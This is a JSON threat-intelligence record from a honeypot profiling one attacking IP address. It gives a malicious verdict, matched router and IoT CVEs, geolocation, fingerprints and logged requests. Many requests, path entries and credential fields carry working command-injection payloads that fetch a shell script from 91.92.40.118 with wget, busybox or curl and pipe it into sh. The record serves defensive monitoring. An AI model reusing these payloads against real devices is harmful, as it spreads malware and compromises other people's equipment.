{"ip":"45.153.34.252","total_events":596,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"37 exploit-path hits","confidence":"high","network_type":null,"why":["37 request(s) matched a known exploit path.","Body-carrying methods (POST/PUT/PATCH/DELETE) seen: payload delivery, not just recon.","5+ hits raise confidence to high.","Not in any known-scanner range."]},"first_seen":"2026-07-08T02:15:11","last_seen":"2026-07-11T21:53:12","events_24h":183,"events_7d":596,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"Limburg","city":"Eygelshoven","lat":50.8897,"lon":6.0563,"asn":197170,"org":"TechTies Inc."},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2007-3010","title":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/masterCGI"},{"cve_id":"CVE-2020-9054","title":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/weblogin.cgi"},{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"},{"cve_id":"CVE-2014-2321","title":"ZTE Cable Modem Web Shell","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web_shell_cmd.gch"},{"cve_id":"CVE-2022-25226","title":"ThinVNC - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cmd"},{"cve_id":"CVE-2021-41648","title":"PuneethReddyHC action.php SQL Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/action.php"},{"cve_id":"CVE-2021-46381","title":"D-Link DAP-1620 - Local File Inclusion","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/apply.cgi"},{"cve_id":"CVE-2017-5631","title":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php"},{"cve_id":"CVE-2022-3242","title":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/search.php"},{"cve_id":"CVE-2022-46888","title":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php"},{"cve_id":"CVE-2024-22927","title":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php"},{"cve_id":"CVE-2024-25669","title":"CaseAware a360inc - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php"},{"cve_id":"CVE-2026-27176","title":"MajorDoMo - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/command.php"},{"cve_id":"CVE-2017-17215","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1"}],"malware":[],"top_ports":[{"port":8081,"proto":"tcp","label":"","count":372},{"port":81,"proto":"tcp","label":"","count":189},{"port":80,"proto":"tcp","label":"HTTP","count":35}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn0200_f24fcf356134","po11nn0500_3bc7f06d1d8b","po11nn0400_fdcc3615ee04","po11nn0500_e4a20f97cf95","ge11nn0300_981846a38495"]},"fingerprint_peers":{"ge11nn0200_f24fcf356134":46,"po11nn0400_fdcc3615ee04":13,"po11nn0500_3bc7f06d1d8b":7,"po11nn0500_e4a20f97cf95":6,"ge11nn0300_981846a38495":6},"user_agents":[],"timeline":[{"date":"2026-07-08","count":45},{"date":"2026-07-09","count":143},{"date":"2026-07-10","count":225},{"date":"2026-07-11","count":183}],"recent_events":[{"timestamp":"2026-07-11T21:53:12","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:8081\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/action.php?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mitsu%60","summary":"","payload_hex":"474554202f616374696f6e2e7068703f686f73743d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d732532306d6974737525334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d732532306d697473752533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d732532306d6974737525363020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:CDLHiz3pqBt6ygn+lmQdlf0oYeM=","ja3":"","session":"f2aa3b10-423c-40f5-9ae2-99e4f0733229","seq":1,"duration_ms":100,"bytes_in":281,"bytes_out":78},{"timestamp":"2026-07-11T21:53:11","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"167\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8081\"}","body":"cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s iodata;busybox wget http://91.92.40.118/wget.sh -O-|sh -s iodata;curl http://91.92.40.118/wget.sh|sh -s iodata`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/remote_link3.cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f72656d6f74655f6c696e6b332e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203136370d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a636d643d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320696f646174613b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320696f646174613b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d7320696f6461746160","method":"POST","user_agent":"","community_id":"1:RaLpXesNbfmevYu2Smm3nF/F4tU=","ja3":"","session":"5ecb5818-73e0-4e91-adae-2e401cbf3ac9","seq":1,"duration_ms":100,"bytes_in":325,"bytes_out":78},{"timestamp":"2026-07-11T21:53:11","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:8081\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api/ping?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20genie%60","summary":"","payload_hex":"474554202f6170692f70696e673f686f73743d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323067656e696525334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323067656e69652533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d7325323067656e696525363020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:3OnGCOQY0zPPOHka9yfV7pDhBno=","ja3":"","session":"884aab4f-317f-47e5-859c-4c7bca1f5c92","seq":1,"duration_ms":100,"bytes_in":279,"bytes_out":78},{"timestamp":"2026-07-11T21:53:10","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"180\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8081\"}","body":"ping=127.0.0.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s airspan;busybox wget http://91.92.40.118/wget.sh -O-|sh -s airspan;curl http://91.92.40.118/wget.sh|sh -s airspan`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/diagnostics.cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f646961676e6f73746963732e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203138300d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a70696e673d3132372e302e302e31606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73206169727370616e3b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73206169727370616e3b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d73206169727370616e60","method":"POST","user_agent":"","community_id":"1:zrvsSHA7tvxQtG+MKq9ftwq2BBY=","ja3":"","session":"d2bd87d1-4060-4040-a66f-7caed0c9d30b","seq":1,"duration_ms":100,"bytes_in":337,"bytes_out":78},{"timestamp":"2026-07-11T21:53:10","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:8081\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/adv_remotelog.asp?syslogServerAddr=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20billion%60","summary":"","payload_hex":"474554202f6164765f72656d6f74656c6f672e6173703f7379736c6f67536572766572416464723d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323062696c6c696f6e25334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323062696c6c696f6e2533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d7325323062696c6c696f6e25363020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:bP3yhtdPWC7bpIXzwRefemECaf4=","ja3":"","session":"794d380c-4b03-4fca-b048-8a6a5d5861ac","seq":1,"duration_ms":100,"bytes_in":306,"bytes_out":78},{"timestamp":"2026-07-11T21:53:09","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"GET /api/v1/status?command=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s xiaomi;busybox wget http://91.92.40.118/wget.sh -O-|sh -s xiaomi;curl http://91.92.40.118/wget.sh|sh -s xiaomi` HTTP/1.1\r\nHost: <HONEYPOT>:8081\r\nConnection: close\r\n\r\n","payload_hex":"474554202f6170692f76312f7374617475733f636f6d6d616e643d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73207869616f6d693b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73207869616f6d693b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d73207869616f6d696020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"","user_agent":"","community_id":"1:SqaQk82lAgNf1yPfTDGDIUkh5X4=","ja3":"","session":"45d52edc-dd02-4d15-b751-f6ea04731fc7","seq":1,"duration_ms":100,"bytes_in":248,"bytes_out":78,"enriched":{"digest":"0c4f2b1bfc7d70c7","label":"HTTP","strings":["GET /api/v1/status?command=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s x…","Host: <HONEYPOT>:8081","Connection: close"],"iocs":{"urls":["http://91.92.40.118/wget.sh"],"ips":["91.92.40.118"],"domains":["wget.sh"],"paths":["/api/v1/status","/91.92.40.118/wget.sh"]}}},{"timestamp":"2026-07-11T21:53:09","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:8081\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/login.cgi?cli=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%60","summary":"","payload_hex":"474554202f6c6f67696e2e6367693f636c693d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d73253230646c636c6925334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d73253230646c636c692533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d73253230646c636c6925363020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:2SeuaomqlGtaKgGTFlNC+3+ethg=","ja3":"","session":"80522765-ff0e-4e84-9108-1d409fd58f62","seq":1,"duration_ms":100,"bytes_in":279,"bytes_out":78},{"timestamp":"2026-07-11T21:53:09","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"164\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8081\"}","body":"cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dlcmd;busybox wget http://91.92.40.118/wget.sh -O-|sh -s dlcmd;curl http://91.92.40.118/wget.sh|sh -s dlcmd`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/command.php","summary":"","payload_hex":"504f5354202f636f6d6d616e642e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203136340d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a636d643d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320646c636d643b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320646c636d643b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d7320646c636d6460","method":"POST","user_agent":"","community_id":"1:YEBdf24RCgXN7ieeHd3XWHf38zY=","ja3":"","session":"470ab003-1161-4a13-9874-eed0f595178d","seq":1,"duration_ms":100,"bytes_in":309,"bytes_out":78},{"timestamp":"2026-07-11T21:53:08","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"GET /edgserver/capture_packages?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s advan;busybox wget http://91.92.40.118/wget.sh -O-|sh -s advan;curl http://91.92.40.118/wget.sh|sh -s advan` HTTP/1.1\r\nHost: <HONEYPOT>:8081\r\nConnection: close\r\n\r\n","payload_hex":"474554202f6564677365727665722f636170747572655f7061636b616765733f706172616d3d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320616476616e3b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320616476616e3b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d7320616476616e6020485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"","user_agent":"","community_id":"1:JhnqiDtdmP9cNu+dhnlSbNXrXD0=","ja3":"","session":"cd9f964d-102c-4c18-ac97-31ae884d3d4b","seq":1,"duration_ms":100,"bytes_in":256,"bytes_out":78,"enriched":{"digest":"32f988be9a2140fb","label":"HTTP","strings":["GET /edgserver/capture_packages?param=`cd /tmp;wget http://91.92.40.118/wget.sh …","Host: <HONEYPOT>:8081","Connection: close"],"iocs":{"urls":["http://91.92.40.118/wget.sh"],"ips":["91.92.40.118"],"domains":["wget.sh"],"paths":["/edgserver/capture_packages","/91.92.40.118/wget.sh"]}}},{"timestamp":"2026-07-11T21:53:08","port":8081,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"32\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8081\"}","body":"date=wget 91.92.40.118/r|sh -s w","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/makeRequest.cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f6d616b65526571756573742e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a383038310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a646174653d776765742039312e39322e34302e3131382f727c7368202d732077","method":"POST","user_agent":"","community_id":"1:wK5yV0Vq2YbGUGrh0MM8++iYM78=","ja3":"","session":"d23260b8-ef84-45d9-9534-d5ca08a4f5f0","seq":1,"duration_ms":100,"bytes_in":188,"bytes_out":78}],"http_methods":[{"method":"POST","count":327},{"method":"GET","count":179}],"distinct_ports_total":3,"top_paths":[{"path":"/apply.cgi","count":64,"ports":3},{"path":"/","count":63,"ports":3},{"path":"/JNAP/","count":48,"ports":3},{"path":"/tmUnblock.cgi","count":25,"ports":3},{"path":"/cgi-bin/cstecgi.cgi","count":14,"ports":2},{"path":"/diagnostic.php","count":13,"ports":3},{"path":"/goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda","count":12,"ports":3},{"path":"/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60","count":12,"ports":3},{"path":"/cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel;","count":12,"ports":3},{"path":"/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60","count":12,"ports":3},{"path":"/setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup","count":12,"ports":3},{"path":"/config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs","count":12,"ports":3},{"path":"/login.cgi","count":12,"ports":3},{"path":"/sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo","count":12,"ports":3},{"path":"/hndUnblock.cgi","count":12,"ports":3}],"distinct_paths_total":90,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[{"username":";`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s mtrail;busy","password":"","count":3},{"username":"admin`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyx326;","password":"x","count":3},{"username":"admin","password":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s sound4;busyb","count":3},{"username":"","password":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s netis;busybo","count":3}],"header_profile":{"signature":["Connection","Content-Length","Content-Type","Host"],"representative":[{"name":"Connection","value":"close","notable":false},{"name":"Content-Length","value":"167","notable":false},{"name":"Content-Type","value":"application/x-www-form-urlencoded","notable":true},{"name":"Host","value":"<HONEYPOT>:8081","notable":false}],"distinct_sets":2,"events_with_headers":8},"tags":[{"tag_id":"CVE-2007-3010","tag_type":"cve","title":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/masterCGI","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2007-3010","https://marc.info/?l=full-disclosure&m=119002152126755&w=2","http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php","http://www.vupen.com/english/advisories/2007/3185","http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm"]},{"tag_id":"CVE-2020-9054","tag_type":"cve","title":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/weblogin.cgi","reference_urls":["https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/","https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml","https://nvd.nist.gov/vuln/detail/CVE-2020-9054","https://kb.cert.org/vuls/id/498544/","https://cwe.mitre.org/data/definitions/78.html"]},{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]},{"tag_id":"CVE-2014-2321","tag_type":"cve","title":"ZTE Cable Modem Web Shell","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web_shell_cmd.gch","reference_urls":["https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/","https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/","https://nvd.nist.gov/vuln/detail/CVE-2014-2321","http://www.kb.cert.org/vuls/id/600724","http://www.myxzy.com/post-411.html"]},{"tag_id":"CVE-2022-25226","tag_type":"cve","title":"ThinVNC - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cmd","reference_urls":[]},{"tag_id":"CVE-2021-41648","tag_type":"cve","title":"PuneethReddyHC action.php SQL Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/action.php","reference_urls":["https://github.com/MobiusBinary/CVE-2021-41648","https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system","https://nvd.nist.gov/vuln/detail/CVE-2021-41649","http://packetstormsecurity.com/files/165036/PuneethReddyHC-Online-Shopping-System-Advanced-1.0-SQL-Injection.html","https://github.com/nu11secur1ty/Windows10Exploits"]},{"tag_id":"CVE-2021-46381","tag_type":"cve","title":"D-Link DAP-1620 - Local File Inclusion","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/apply.cgi","reference_urls":["https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing","https://www.dlink.com/en/security-bulletin/","https://nvd.nist.gov/vuln/detail/CVE-2021-46381","http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html","https://github.com/SYRTI/POC_to_review"]},{"tag_id":"CVE-2017-5631","tag_type":"cve","title":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php","reference_urls":["https://www.openbugbounty.org/incidents/228262/","https://www.exploit-db.com/exploits/42042/","https://nvd.nist.gov/vuln/detail/CVE-2017-5631","https://github.com/ARPSyndicate/cvemon","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2022-3242","tag_type":"cve","title":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/search.php","reference_urls":["https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/","https://www.tenable.com/cve/CVE-2022-3242","https://nvd.nist.gov/vuln/detail/CVE-2022-3242","https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c"]},{"tag_id":"CVE-2022-46888","tag_type":"cve","title":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php","reference_urls":["https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities","https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33","https://nvd.nist.gov/vuln/detail/CVE-2022-46888","https://github.com/ARPSyndicate/cvemon","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2024-22927","tag_type":"cve","title":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php","reference_urls":["https://github.com/weng-xianhu/eyoucms/issues/57","https://nvd.nist.gov/vuln/detail/CVE-2024-22927"]},{"tag_id":"CVE-2024-25669","tag_type":"cve","title":"CaseAware a360inc - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/login.php","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2024-25669"]},{"tag_id":"CVE-2026-27176","tag_type":"cve","title":"MajorDoMo - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/command.php","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2026-27176"]},{"tag_id":"CVE-2017-17215","tag_type":"cve","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1","reference_urls":[]},{"tag_id":"Network Device Auth Bypass / RCE Probe","tag_type":"malware","title":"Network Device Auth Bypass / RCE Probe","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"SetRemoteAccessCfg","reference_urls":[]}],"data_as_of":"2026-07-11T23:11:30.054115+00:00"}